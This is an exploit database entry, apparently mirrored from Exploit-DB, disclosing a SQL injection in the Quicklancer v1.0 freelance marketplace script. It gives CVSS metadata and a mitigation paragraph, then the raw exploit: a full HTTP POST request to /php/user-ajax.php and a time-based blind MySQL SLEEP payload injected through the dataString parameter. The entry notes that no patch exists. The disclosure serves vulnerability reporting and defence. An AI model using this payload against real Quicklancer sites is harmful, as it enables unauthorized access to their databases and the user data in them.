Quicklancer v1.0 - SQL Injection

vendor:

Quicklancer

by:

Ahmet Ümit BAYRAM

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Quicklancer

Affected Version From: Quicklancer v1.0

Affected Version To: Quicklancer v1.0

Patch Exists: NO

Related CWE:

CPE: a:codecanyon:quicklancer:1.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2023

Quicklancer v1.0 – SQL Injection

The Quicklancer v1.0 script is vulnerable to SQL Injection. This can be exploited by an attacker to manipulate the SQL queries and gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input before using it in SQL queries or use prepared statements with parameterized queries. Regular security audits and code reviews should also be conducted to identify and fix any potential SQL Injection vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: Quicklancer v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135
# Demo Site: https://quicklancer.bylancer.com
# Tested on: Kali Linux
# CVE: N/A


### Request ###

POST /php/user-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost
Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;
quickjob_view_counted=31; Quick_lang=arabic
Content-Length: 93
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

action=searchStateCountry&dataString=deneme


### Parameter & Payloads ###

Parameter: dataString (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068
FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo